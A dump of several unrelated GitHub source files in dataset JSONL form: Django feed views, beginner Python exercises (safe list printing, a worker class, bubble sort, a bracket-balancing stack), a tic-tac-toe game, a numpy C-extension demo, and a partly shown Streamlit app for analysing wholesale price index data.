get_queryset(self):\n        queryset: QuerySet = super().get_queryset()\n        # The index is only used when the ordering matches these columns in this exact order\n        # TODO: add an index on -num_likes\n        ordered_qs: QuerySet = (\n            queryset.order_by(\"num_likes\", \"num_comments\", \"created_at\")\n            .reverse()\n            .cache()\n        )\n        return ordered_qs\n\n\nclass LatestFeedListView(BaseFeedListView):\n    def get_queryset(self):\n        queryset = super().get_queryset()\n        ordered_qs = queryset.order_by(\"-created_at\").cache()\n        return ordered_qs\n\n\nclass MyFeedListView(BaseFeedListView):\n    def get_queryset(self):\n        queryset = super().get_queryset()\n        user = self.request.user\n        return queryset.filter(user=user).cache()\n\n\nclass MyFeedStatusView(APIView):\n\n    permission_classes = [IsAuthenticated]\n\n    def get(self, request):\n        user = request.user\n        data = {\n            \"num_my_feeds\": user.feeds.all().cache().count(),\n            \"num_my_likes\": user.num_received_feed_likes(),\n            \"num_my_reply\": user.num_received_comments(),\n        }\n\n        return Response(\n            data=data,\n            status=HTTP_200_OK,\n        )\n","repo_name":"junha6316/connecting_feed","sub_path":"feeds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37189418817","text":"#!/usr/bin/python3\ndef safe_print_list(my_list=[], x=0):\n    idx = 0\n    while idx < x:\n        try:\n            print(\"{}\".format(my_list[idx]), end=\"\")\n            idx += 1\n        except IndexError:\n            break\n    print(\"\")\n    return idx\n","repo_name":"amanabiy/alx-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24137016958","text":"# 3. Implement a base class Worker that defines the\n# attributes: name, surname, position, and income.\n# The last attribute must be protected and reference a dictionary\n# containing the elements wage and bonus, e.g. {\"wage\": wage, \"bonus\": bonus}.\n# Create a class Position based on the Worker class. In the Position class,\n# implement methods that return the employee's full name (get_full_name) and the income\n# including the bonus (get_total_income). Verify the example on real data (\n# create Position instances, pass in data, check the attribute values, call the instance methods).\n\n\nclass Worker:\n    name: str\n    surname: str\n    position: str\n    _income: dict\n\n    def __init__(self, name, surname, position):\n        self.name = name\n        self.surname = surname\n        self.position = position\n        self._income = {\"wage\": 0, \"bonus\": 0}\n\n\nclass Position(Worker):\n\n    def get_full_name(self):\n        string = f\"{self.surname} {self.name}\"\n        return string\n\n    def get_total_income(self, rand):\n        self._income[\"wage\"] = 5000 * rand\n        self._income[\"bonus\"] = 1000 * rand\n        return self._income[\"wage\"] + self._income[\"bonus\"]\n\n\none = Position(\"Виктория\", \"Белогородова\", \"Python developer\")\ntwo = Position(\"Максим\", \"Заборов\", \"Python tester\")\nthree = Position(\"Филипп\", \"Забулдыга\", \"Python developer\")\n\nprint(f\"Full name: {one.get_full_name()} - Income: {one.get_total_income(1)} rub.\")\nprint(f\"Full name: {two.get_full_name()} - Income: {two.get_total_income(0.5)} rub.\")\nprint(f\"Full name: {three.get_full_name()} - Income: {three.get_total_income(0.2)} rub.\")\n","repo_name":"MisterHat-89/geekBrainsPython","sub_path":"Lesson_6/exam_3.py","file_name":"exam_3.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27792904547","text":"l = [5,8,1,3,2]\n\n#Bubble Sort Algorithm\n# Bubble Sort is a very simple but inefficient sorting algorithm. \n# Its time complexity is O(n^2), meaning that the number of steps \n# required is proportional to the square of the size of the list.\nstill_swapping = True\n\nwhile still_swapping:\n    still_swapping = False\n    for i in range(len(l) - 1):\n        if l[i] > l[i+1]:\n            l[i], l[i+1] = l[i+1], l[i]\n            still_swapping = True\nprint(l)","repo_name":"CateGitau/Python_programming","sub_path":"Packt_Python_programming/Chapter_3/exercise39.py","file_name":"exercise39.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38789035387","text":"# Yunshu Zhao\n# 2016 Winter Term\n# University of Alberta\n\nimport random\n\nclass TicTacToe:\n    def __init__(self):\n        # \"board\" is a list of 10 strings representing the board (ignore index 0)\n        self.board = [\" \"]*10\n        self.board[0]=\"#\"\n        \n#------------------------------------------------------------- \n    def drawBoard(self):\n        # This method prints out the board with current plays adjacent to a board with index.\n        print(' ' + self.board[7] + ' | ' + self.board[8] + ' | ' + self.board[9],'  7 | 8 | 9 ', sep='\\t')\n        print('-----------','-----------', sep='\\t')\n        print(' ' + self.board[4] + ' | ' + self.board[5] + ' | ' + self.board[6],'  4 | 5 | 6 ', sep='\\t')\n        print('-----------','-----------', sep='\\t')\n        print(' ' + self.board[1] + ' | ' + self.board[2] + ' | ' + self.board[3],'  1 | 2 | 3 ', sep='\\t')\n        \n#------------------------------------------------------------- \n    def boardFull(self):\n        # This method checks if the board is already full and returns True. 
Returns False otherwise.\n        if \" \" in self.board:\n            return False\n        else:\n            return True\n    \n#------------------------------------------------------------- \n    def cellIsEmpty(self, cell):\n        if cell==0 or cell>9:\n            return False\n        else:\n            return self.board[cell]==\" \"\n\n#------------------------------------------------------------- \n    def assignMove(self, cell,ch):\n        # assigns the cell of the board to the character ch\n        if cell<10 and cell>0:\n            self.board[cell]=ch \n        \n#------------------------------------------------------------- \n    def whoWon(self):\n        # returns the symbol of the player who won if there is a winner, otherwise it returns an empty string. \n        if self.isWinner(\"x\"):\n            return \"x\"\n        elif self.isWinner(\"o\"):\n            return \"o\"\n        else:\n            return \"\"\n\n#------------------------------------------------------------- \n    def isWinner(self, ch):\n        # Given a player's letter, this method returns True if that player has won.\n        return ((self.board[7] == ch and self.board[8] == ch and self.board[9] == ch) or # across the top\n                (self.board[4] == ch and self.board[5] == ch and self.board[6] == ch) or # across the middle\n                (self.board[1] == ch and self.board[2] == ch and self.board[3] == ch) or # across the bottom\n                (self.board[7] == ch and self.board[4] == ch and self.board[1] == ch) or # down the left side\n                (self.board[8] == ch and self.board[5] == ch and self.board[2] == ch) or # down the middle\n                (self.board[9] == ch and self.board[6] == ch and self.board[3] == ch) or # down the right side\n                (self.board[7] == ch and self.board[5] == ch and self.board[3] == ch) or # diagonal\n                (self.board[9] == ch and self.board[5] == ch and self.board[1] == ch)) # diagonal  \n    \n# Check if the first available cell is empty and place the symbol \n    def dumbComputer(self,ch):\n        for x in range(1,10):\n            if self.cellIsEmpty(x):\n                self.assignMove(x,ch)\n                break\n        \n# Randomly select a cell from the available positions\n    def randomComputer(self,ch,randomMove):\n        freePosition = []\n        for x in range(1,10):\n            if self.cellIsEmpty(x):\n                freePosition.append(x)  \n        \n        if randomMove in freePosition:\n            self.assignMove(randomMove,ch)\n        elif randomMove not in freePosition:\n            self.assignMove(random.choice(freePosition),ch)\n\n#----------------------------------------------- \n    def smartComputer(self,ch):\n        \n        corner = []\n        side = []\n        freePosition = []\n        cell = []   \n        \n        for x in range(1,10):\n            if x in (1, 3, 7, 9):\n                if self.board[x] == ' ':\n                    corner.append(x)\n            if x in (2, 4, 6, 8):\n                if self.board[x] == ' ':\n                    side.append(x)  \n            \n            if self.cellIsEmpty(x):\n                freePosition.append(x)\n            \n            if not self.cellIsEmpty(x):\n                cell.append(x)\n        \n        if self.board[5] == ' ': # If the center is empty, place the symbol there\n            self.assignMove(5,ch)\n        \n        elif self.board[5] != ' ' and len(freePosition) == 7:  \n            self.assignMove(random.choice(corner),ch)   \n        \n        elif len(freePosition) in (8, 6):\n            if len(corner) != 0:\n                self.assignMove(random.choice(side),ch)\n            \n            else:\n                self.assignMove(random.choice(corner),ch)   \n\n# Check every possible win position--------------------------- \n        elif self.board[7] == ch and self.board[8] == ch:\n            if self.cellIsEmpty(9):\n                self.assignMove(9,ch)   \n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[8] == ch and self.board[9] == ch:\n            if self.cellIsEmpty(7):\n                self.assignMove(7,ch)   \n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[7] == ch and self.board[9] == ch:\n            if self.cellIsEmpty(8):\n                self.assignMove(8,ch)   \n            else:\n                
self.assignMove(random.choice(freePosition),ch)  \n# Check every possible win position---------------------------- \n        elif self.board[4] == ch and self.board[5] == ch:\n            if self.cellIsEmpty(6):\n                self.assignMove(6,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[5] == ch and self.board[6] == ch:\n            if self.cellIsEmpty(4):\n                self.assignMove(4,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[4] == ch and self.board[6] == ch:\n            if self.cellIsEmpty(5):\n                self.assignMove(5,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n# Check every possible win position---------------------------- \n        elif self.board[1] == ch and self.board[2] == ch:\n            if self.cellIsEmpty(3):\n                self.assignMove(3,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[2] == ch and self.board[3] == ch:\n            if self.cellIsEmpty(1):\n                self.assignMove(1,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[1] == ch and self.board[3] == ch:\n            if self.cellIsEmpty(2):\n                self.assignMove(2,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n# Check every possible win position---------------------------- \n        elif self.board[7] == ch and self.board[4] == ch:\n            if self.cellIsEmpty(1):\n                self.assignMove(1,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[7] == ch and self.board[1] == ch:\n            if self.cellIsEmpty(4):\n                self.assignMove(4,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[1] == ch and self.board[4] == ch:\n            if self.cellIsEmpty(7):\n                self.assignMove(7,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n# Check every possible win position---------------------------- \n        elif self.board[8] == ch and self.board[5] == ch:\n            if self.cellIsEmpty(2):\n                self.assignMove(2,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[8] == ch and self.board[2] == ch:\n            if self.cellIsEmpty(5):\n                self.assignMove(5,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[2] == ch and self.board[5] == ch:\n            if self.cellIsEmpty(8):\n                self.assignMove(8,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n# Check every possible win position---------------------------- \n        elif self.board[9] == ch and self.board[6] == ch:\n            if self.cellIsEmpty(3):\n                self.assignMove(3,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[9] == ch and self.board[3] == ch:\n            if self.cellIsEmpty(6):\n                self.assignMove(6,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[3] == ch and self.board[6] == ch:\n            if self.cellIsEmpty(9):\n                self.assignMove(9,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n# Check every possible win position---------------------------- \n        elif self.board[7] == ch and self.board[5] == ch:\n            if self.cellIsEmpty(3):\n                self.assignMove(3,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[7] == ch and self.board[3] == ch:\n            if self.cellIsEmpty(5):\n                self.assignMove(5,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[5] == ch and self.board[3] == ch:\n            if self.cellIsEmpty(7):\n                self.assignMove(7,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n# Check every possible win position---------------------------- \n        elif self.board[9] == ch and self.board[5] == ch:\n            if self.cellIsEmpty(1):\n                self.assignMove(1,ch)\n            else:\n                
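# no winning cell is open on this line, so fall back to a random free cell\n                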
self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[9] == ch and self.board[1] == ch:\n            if self.cellIsEmpty(5):\n                self.assignMove(5,ch)\n            else:\n                self.assignMove(random.choice(freePosition),ch)  \n        elif self.board[1] == ch and self.board[5] == ch:\n            if self.cellIsEmpty(9):\n                self.assignMove(9,ch)  \n            else:\n                self.assignMove(random.choice(freePosition),ch)\n        print(len(freePosition))\n\n#------------------------------------------------------------- \n# The main program\ndef main():\n    print (\"Welcome to Tic Tac Toe Series\")\n    myGameLoop=True\n    \n    while myGameLoop:\n        myBoard=TicTacToe()\n        gameIsOn=True\n        nameInput = ' '\n        typeInput = ' '\n        while typeInput not in '1 2 3 4 5 6'.split():\n            print('User against user ...............1',\n                  'User against dumb computer ......2',\n                  'User against random computer ....3',\n                  'User against smart computer......4',\n                  'Randomly selected game...........5',  \n                  'Quit ............................6',\n                  'Enter your choice: ',\n                  sep='\\n')\n            typeInput = input()  \n        \n        if typeInput == '5':  \n            typeInput = str(random.randint(1,4)) # Randomly select from options 1 to 4\n        if typeInput != '6':\n            nameInput = input('what is your name? ') # If the input is 6 the program quits, otherwise ask the user for a name\n        \n        \n        turnInput=\" \"\n        while turnInput not in 'x o r'.split():\n            turnInput = input(nameInput+', do you want to play x or o? Type r if you want me to choose for you.'+'\\n').lower()  \n        \n        turn = 'x' # x always goes first\n        \n        if turnInput == 'o':\n            computer = 'x' # Set the computer's letter\n        \n        elif turnInput == 'x':\n            computer = 'o'\n        \n        elif turnInput == 'r':\n            turnInput = random.choice('xo')\n            \n            if turnInput == 'x': # Since turnInput was chosen randomly, give the computer the opposite letter\n                computer = 'o'\n            elif turnInput == 'o':\n                computer = 'x'\n        \n        #------------------------------------------------------------- \n        while gameIsOn and typeInput != '6':\n            \n            #------------------------------------------------------------- \n            # User against user  \n            if typeInput == '1': \n                \n                print('User against user')  \n                \n                myBoard.drawBoard()\n                print (\"It is the turn for\", turn,\". \",end=\"\")\n                move=\"0\"\n                while not myBoard.cellIsEmpty(int(move)):\n                    move=\"0\"\n                    while move not in \"1 2 3 4 5 6 7 8 9\".split():\n                        move=input(\"what is your move?\")\n                    if not myBoard.cellIsEmpty(int(move)):\n                        print (move,\"is not available. \",end='')\n                        move=\"0\"\n                myBoard.assignMove(int(move),turn)\n                winner=myBoard.whoWon()\n                if winner!='':\n                    myBoard.drawBoard()\n                    print (turn,\"wins. Congrats!\")\n                    input(\"Press Enter to continue\")  \n                    gameIsOn=False\n                elif myBoard.boardFull():\n                    myBoard.drawBoard()\n                    print (\"It's a tie.\")\n                    input(\"Press Enter to continue\")  \n                    gameIsOn=False\n                elif turn==\"x\":\n                    turn=\"o\"\n                else:\n                    turn=\"x\"\n            \n            #-------------------------------------------------------------\n            # This part is used to play against the computer\n            elif typeInput in ('2', '3', '4'): \n                \n                if typeInput == '2':\n                    print('User against dumb computer')\n                elif typeInput == '3':\n                    print('User against random computer')  \n                    randomMove = random.randint(1,9)\n                elif typeInput == '4':\n                    print('User against smart computer')\n                \n                myBoard.drawBoard()\n                print('-------------------------------')\n                \n                if turn == turnInput: \n                    print (\"It is the turn for\", turn,\". \",end=\"\")\n                    \n                    move=\"0\"\n                    while not myBoard.cellIsEmpty(int(move)):\n                        move=\"0\"\n                        while move not in \"1 2 3 4 5 6 7 8 9\".split():\n                            \n                            move=input(\"what is your move?\")\n                        if not myBoard.cellIsEmpty(int(move)):\n                            print (move,\"is not available. \
\",end='')\n move=\"0\"\n \n myBoard.assignMove(int(move),turnInput)\n \n else:\n if typeInput == '2':\n myBoard.dumbComputer(computer)\n elif typeInput == '3':\n myBoard.randomComputer(computer,randomMove)\n elif typeInput == '4':\n myBoard.smartComputer(computer)\n \n winner=myBoard.whoWon()\n if winner!='': \n myBoard.drawBoard()\n print (turn,\"wins. Congrats!\")\n input(\"Press Enter to continue\") \n gameIsOn=False\n elif myBoard.boardFull():\n myBoard.drawBoard()\n print (\"It's a tie.\")\n input(\"Press Enter to continue\") \n gameIsOn=False\n elif turn==\"x\":\n turn=\"o\"\n else:\n turn=\"x\" \n #------------------------------------------------------------- \n # Check whether the player wants to play again\n answer='x'\n while answer.upper() not in \"YN\":\n answer=input(\"Do you want to play another game? (Y/N)\")\n if answer.upper() == \"N\":\n myGameLoop=False\n if typeInput == '6':\n gameIsOn=False\n\nmain() # Call main function","repo_name":"404Not-found/CMPUT-175-Winter-2016","sub_path":"Assignments/Assignment 2/Assignment 2 TicTacToe.py","file_name":"Assignment 2 TicTacToe.py","file_ext":"py","file_size_in_byte":16991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17463352920","text":"class Stack:\n def __init__(self):\n self.stack = []\n \n def is_empty(self):\n return self.stack == []\n \n def push(self, item):\n self.stack.append(item)\n\n def peek(self):\n return self.stack[-1]\n \n def pop_it(self):\n if self.stack == []:\n return None\n else:\n return self.stack.pop()\n\n def size_it(self):\n return len(self.stack)\n \ndef balanced(s):\n stack = Stack()\n pairs = ['()', '{}', '()']\n bopen = [x[0] for x in pairs]\n bclose = [x[1] for x in pairs]\n if stack.size_it()%2 == 0:\n for c in s:\n if c in bopen:\n stack.push(c)\n elif c in bclose:\n if stack == []:\n return 'Несбалансированно'\n else:\n if f'{stack.peek()}{c}' in pairs:\n stackTop = stack.pop_it()\n else:\n return 'Несбалансированно'\n return 'Сбалансированно'\n else:\n return \"Несбалансировано\"\n\nstring = '[([])((([[[]]])))]{()}'\nprint(balanced(string))\n \n","repo_name":"Julia-Vaulina/stack","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40342227874","text":"import numpy as np\nimport cext04\n\nprint('A new array from C extention')\na = cext04.as_nparray()\nprint(a)\n\nprint('Reading array b in C extension')\nb = np.ones((4, 3))\ncext04.read_2darray(b)\n","repo_name":"junkoda/python_c_ext","sub_path":"04_nparray/use_cext04.py","file_name":"use_cext04.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"74180224247","text":"#Libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom yellowbrick.cluster import KElbowVisualizer\r\nimport streamlit as st\r\nfrom scipy.cluster.hierarchy import dendrogram, linkage\r\nfrom scipy.stats import zscore \r\nfrom statsmodels.tsa.seasonal import seasonal_decompose\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\n#Sklearn libraries\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom keras.models import 
Sequential\r\nfrom keras.layers import Dense, LSTM\r\n\r\n#Data preparation\r\ndata = pd.read_csv('WPI_dataset.csv', index_col='COMM_IDX_MONTH', parse_dates=True)\r\n#Creating dictionary of 22categories dataframe.\r\ncol_names = ['(A). FOOD ARTICLES','(B). NON-FOOD ARTICLES','(C). MINERALS','(D). CRUDE PETROLEUM & NATURAL GAS','II FUEL & POWER',\r\n '(B). MINERAL OILS','(C). ELECTRICITY','III MANUFACTURED PRODUCTS','(B). MANUFACTURE OF BEVERAGES','(C). MANUFACTURE OF TOBACCO PRODUCTS',\r\n '(D). MANUFACTURE OF TEXTILES','(E). MANUFACTURE OF WEARING APPAREL','(F). MANUFACTURE OF LEATHER AND RELATED PRODUCTS',\r\n '(G). MANUFACTURE OF WOOD AND OF PRODUCTS OF WOOD AND CORK ','(H). MANUFACTURE OF PAPER AND PAPER PRODUCTS',\r\n '(I). PRINTING AND REPRODUCTION OF RECORDED MEDIA ','(J). MANUFACTURE OF CHEMICALS AND CHEMICAL PRODUCTS',\r\n '(K). MANUFACTURE OF PHARMACEUTICALS, MEDICINAL CHEMICAL AND BOTANICAL PRODUCTS','(L). MANUFACTURE OF RUBBER AND PLASTICS PRODUCTS',\r\n '(M). MANUFACTURE OF OTHER NON-METALLIC MINERAL PRODUCTS','(N). MANUFACTURE OF BASIC METALS','(O). MANUFACTURE OF FABRICATED METAL PRODUCTS, EXCEPT MACHINERY AND EQUIPMENT']\r\ncategories_dict = {}\r\n\r\nfor i in range(len(col_names)-1):\r\n cl = col_names[i]\r\n start_col = col_names[i]\r\n end_col = col_names[i + 1]\r\n dataframe = data.loc[:, start_col:end_col]\r\n dataframe = dataframe.iloc[:, :-1]\r\n categories_dict [cl] = dataframe\r\nlast_df = data.loc[:,'(O). MANUFACTURE OF FABRICATED METAL PRODUCTS, EXCEPT MACHINERY AND EQUIPMENT':]\r\ncategories_dict ['(O). MANUFACTURE OF FABRICATED METAL PRODUCTS, EXCEPT MACHINERY AND EQUIPMENT'] = last_df\r\n\r\ndef trend_visualization_page():\r\n #1. Trend Visualization\r\n st.title('Interactive WPI Trend Visualization')\r\n\r\n # Task 1: Trend Visualization\r\n st.sidebar.header('Trend Visualization')\r\n selected_category = st.sidebar.selectbox('Select Category', ['Entire Dataset'] + list(categories_dict.keys()))\r\n if selected_category == 'Entire Dataset':\r\n selected_commodities = st.sidebar.multiselect('Select Commodities', data.columns.tolist(), default='ALL COMMODITIES')\r\n else:\r\n selected_commodities = st.sidebar.multiselect('Select Commodities', ['All in Category'] + categories_dict[selected_category].columns.tolist())\r\n if selected_commodities:\r\n plt.figure(figsize=(12, 6))\r\n\r\n if 'All in Category' in selected_commodities and selected_category != 'Entire Dataset':\r\n for commodity in categories_dict[selected_category].columns.tolist():\r\n plt.plot(data.index, categories_dict[selected_category][commodity], label=commodity)\r\n else:\r\n for commodity in selected_commodities:\r\n plt.plot(data.index, data[commodity], label=commodity)\r\n\r\n plt.axhline(y=data['ALL COMMODITIES'].mean(), color='r', linestyle='--', label='Mean WPI')\r\n plt.xlabel('Time')\r\n plt.ylabel('WPI')\r\n plt.title('WPI Trends Over Time')\r\n plt.grid(True)\r\n plt.legend()\r\n plt.tight_layout()\r\n st.pyplot(plt)\r\n \r\ndef calculate_volatility_page():\r\n \r\n st.title('Volatility Analysis')\r\n st.write(\"Volatility analysis helps us understand how the prices of commodities or categories fluctuate over time.\")\r\n st.write(\"In this analysis, we calculate the rolling standard deviation of prices over a 12-month window to measure volatility.\")\r\n st.write(\"Higher volatility indicates greater price fluctuations, while lower volatility suggests price stability.\")\r\n\r\n selected_category_volatility = st.sidebar.selectbox('Select Category for Volatility Calculation', 
list(categories_dict.keys()))\r\n    selected_commodity_volatility = st.sidebar.selectbox('Select Commodity for Volatility Calculation', ['Entire Category'] + list(categories_dict[selected_category_volatility].columns))\r\n    if selected_commodity_volatility == 'Entire Category':\r\n        volatility_df = categories_dict[selected_category_volatility].std()\r\n        volatility_df_cat = data[selected_category_volatility].rolling(window=12).std()\r\n        st.write('Top 3 Highest volatility: ', volatility_df.nlargest(3))\r\n        st.write('Top 3 Lowest volatility (Stable): ', volatility_df.nsmallest(3))\r\n        # Use the rolling, date-indexed series for the date-based summary and plot below\r\n        volatility_df = volatility_df_cat\r\n    else:\r\n        volatility_df = data[selected_commodity_volatility].rolling(window=12).std()\r\n    \r\n    highest_volatility_date = volatility_df.nlargest(1).index[0].strftime('%B %d, %Y')\r\n    highest_volatility_std = round(volatility_df.nlargest(1).values[0], 2)\r\n    st.write(f\"{selected_commodity_volatility} exhibited the highest volatility on {highest_volatility_date}, with a standard deviation of {highest_volatility_std}. This indicates significant price fluctuations for {selected_commodity_volatility} commodities during that period.\")\r\n\r\n    # Create a figure and set its size\r\n    plt.figure(figsize=(12, 6))\r\n\r\n    # Plot the volatility graph\r\n    plt.plot(volatility_df.index, volatility_df.values)\r\n    plt.xlabel('Time')\r\n    plt.ylabel('Volatility')\r\n    plt.title(f'Volatility in {selected_commodity_volatility} WPI')\r\n\r\n\r\n    st.pyplot(plt)\r\n\r\ndef monthy_yearly_rate_change_analysis():\r\n    st.title(\"Inflation Trend Analysis\")\r\n    inflation_plot()\r\n    \r\n    selected_category_column = st.sidebar.selectbox('Select Category', list(categories_dict.keys()))\r\n    selected_commodity_column = st.sidebar.selectbox('Select Commodity', ['Entire Category'] + list(categories_dict[selected_category_column].columns))\r\n    \r\n    \r\n    if selected_commodity_column == 'Entire Category':\r\n        st.header(f'Monthly and Yearly Inflation analysis of {selected_category_column}')\r\n        rate_change_monthly = data[selected_category_column].pct_change() * 100 # Monthly rate of change\r\n        rate_change_yearly = data[selected_category_column].pct_change(periods=12) * 100 # Yearly rate of change\r\n    else:\r\n        st.header(f'Monthly and Yearly Inflation analysis of {selected_commodity_column}')\r\n        rate_change_monthly = data[selected_commodity_column].pct_change() * 100 \r\n        rate_change_yearly = data[selected_commodity_column].pct_change(periods=12) * 100\r\n    \r\n    # Monthly rate of change\r\n    plt.figure(figsize=(12, 6))\r\n    plt.title(f\"Monthly Rate Change for {selected_category_column}\")\r\n    plt.xlabel(\"Date\")\r\n    plt.ylabel(\"Monthly Rate Change (%)\")\r\n    plt.plot(rate_change_monthly.index, rate_change_monthly.values, label=\"Monthly Rate Change\", marker='o')\r\n    plt.legend()\r\n    plt.grid(True)\r\n    st.pyplot(plt)\r\n    \r\n    # Yearly rate of change\r\n    plt.figure(figsize=(12, 6))\r\n    plt.title(f\"Yearly Rate Change for {selected_category_column}\")\r\n    plt.xlabel(\"Date\")\r\n    plt.ylabel(\"Yearly Rate Change (%)\")\r\n    plt.plot(rate_change_yearly.index, rate_change_yearly.values, label=\"Yearly Rate Change\", marker='o')\r\n    plt.legend()\r\n    plt.grid(True)\r\n    st.pyplot(plt)\r\n    \r\n    # Find and print the maximum inflation year and month\r\n    max_monthly_inflation = rate_change_monthly.idxmax()\r\n    max_yearly_inflation = rate_change_yearly.idxmax()\r\n    \r\n    # st.write(f\"Maximum Inflation occurred in {max_monthly_inflation.strftime('%B %Y')}\")\r\n    st.write(f\"Maximum Inflation occurred in {max_yearly_inflation.strftime('%Y')}\")\r\n\r\n    \r\ndef 
correlation_analysis_commodity():\r\n #Correlation between Category index and commodities in that category\r\n st.title('Correlation Analysis')\r\n\r\n # Add information about correlation analysis\r\n st.write(\"Correlation analysis helps us understand the relationship between different commodities within a selected category.\")\r\n st.write(\"The heatmap below shows the correlation between commodities in the selected category.\")\r\n\r\n selected_category_correlation = st.sidebar.selectbox('Select Category for Correlation Calculation', list(categories_dict.keys()))\r\n correlation_df = categories_dict[selected_category_correlation]\r\n correlation_matrix = correlation_df.corr()\r\n \r\n plt.figure(figsize=(12, 10))\r\n mask = correlation_matrix == 1.0\r\n sns.heatmap(correlation_matrix, annot=True, cmap='coolwarm', fmt=\".2f\", linewidths=.5)\r\n plt.title('Correlation between Category-wise Overall Value and commodities in that Category')\r\n st.pyplot(plt)\r\n \r\n category_correlation_matrix = correlation_matrix[selected_category_correlation].drop(selected_category_correlation)\r\n top_corr_df = category_correlation_matrix.abs().sort_values(ascending=False)\r\n top_corr_df = top_corr_df[top_corr_df < 1.0] \r\n top_corr = top_corr_df.head(3)\r\n \r\n st.write(f\"The commodity with the maximum correlation to '{selected_category_correlation}' is:\")\r\n st.write(f\"{top_corr.index[0]} with correlation value: {top_corr.values[0]:.2f}\")\r\n st.write(f\"After that {top_corr.index[1]} with correlation value: {top_corr.values[1]:.2f}\")\r\n st.write(f\"After that {top_corr.index[2]} with correlation value: {top_corr.values[2]:.2f}\")\r\n \r\ndef clustering_page():\r\n st.header(\"Cluster Analysis\")\r\n st.write(\"Using clustering algorithms to group similar categories together.\")\r\n excluded_columns = col_names + ['ALL COMMODITIES']\r\n commodities_data = data.drop(columns=excluded_columns).T\r\n from sklearn.preprocessing import StandardScaler\r\n\r\n scaler = StandardScaler()\r\n scaled_data = scaler.fit_transform(commodities_data)\r\n \r\n model = KMeans()\r\n visualizer = KElbowVisualizer(model, k=(1,12))\r\n visualizer.fit(scaled_data)\r\n # visualizer.show()\r\n\r\n # Get the optimal number of clusters\r\n n_clusters = visualizer.elbow_value_\r\n\r\n # Apply K-Means clustering with the optimal number of clusters\r\n kmeans = KMeans(n_clusters=n_clusters, random_state=42)\r\n clusters = kmeans.fit_predict(scaled_data)\r\n \r\n commodities_data['Cluster'] = clusters\r\n \r\n pca = PCA(n_components=2)\r\n reduced_data = pca.fit_transform(scaled_data)\r\n\r\n plt.figure(figsize=(10, 6))\r\n scatter = plt.scatter(reduced_data[:, 0], reduced_data[:, 1], c=clusters, cmap='viridis', alpha=0.6)\r\n plt.title('2D PCA of Commodities Clusters')\r\n plt.xlabel('Principal Component 1')\r\n plt.ylabel('Principal Component 2')\r\n plt.colorbar(scatter)\r\n st.pyplot(plt)\r\n \r\ndef heatmap_page1(): #Correlation between categories and General index\r\n st.header(\"Heatmap\")\r\n st.write(\"Heatmap showing the correlation between categories in the WPI dataset.\")\r\n\r\n selected_columns = col_names + ['ALL COMMODITIES']\r\n correlation_df = data[selected_columns]\r\n correlation_matrix = correlation_df.corr()\r\n \r\n plt.figure(figsize=(12, 10))\r\n sns.heatmap(correlation_matrix, annot=True, cmap='coolwarm', fmt=\".2f\", linewidths=.5)\r\n plt.title('Correlation between Category-wise Overall Value and General WPI Index')\r\n st.pyplot(plt)\r\n \r\n all_comm_correlation_matrix = 
